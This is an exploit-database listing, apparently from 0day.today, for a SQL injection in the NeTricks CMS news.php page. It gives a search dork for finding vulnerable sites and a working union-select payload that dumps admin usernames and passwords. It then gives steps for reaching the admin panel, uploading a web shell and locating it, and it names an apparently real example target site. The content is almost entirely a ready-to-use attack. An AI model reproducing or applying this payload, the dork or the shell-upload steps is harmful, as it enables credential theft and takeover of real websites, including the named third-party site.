[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NeTricks CMS (news.php) SQL Injection Vulnerability

Author
Dr.SiLnT HilL
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12389
Category
web applications
Date add
24-05-2010
Platform
php
===================================================
NeTricks CMS (news.php) SQL Injection Vulnerability
===================================================



####################################################################################################################################

# Name: Website Design and Hosting By Netricks, Inc.

# Date: 25-05-2010

# vendor: http://www.netricks.com

# Dork: intext:" Website Design and Hosting By Netricks, Inc."

# Discovered By: Dr.SiLnT HilL

# Contact : i0x0@hotmail.com

# MY Team : TeaM HacKer Egypt

###################################################################################################################################



[+] SQL Injection Vulnerability:


[+] Vulnerability: http://[site]/[path]/news.php?ax=v&n=10&id=10&nid==[SQL Injection]


[+][+] Exploit [+][+]


 http://[site]/[path]/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,group_concat(username,0x3e,password),3,4,5+from+php_users--


[+][+] Admin Panel [+][+]


http://localhost/[path]/admin


[+][+] Upload your shell [+][+]


http://[site]/[path]/admin/content.php?ax=file_upload



[+][+] your shell [+][+]


http://[site]/[path]/gallery/shell.php


[+][+] Example [+][+]


http://clovisnewhomes.net

#####################################
Th4nks : Mr.AlsaeeK , Mr.Fire Stormm 
#####################################



#  0day.today [2024-09-20]  #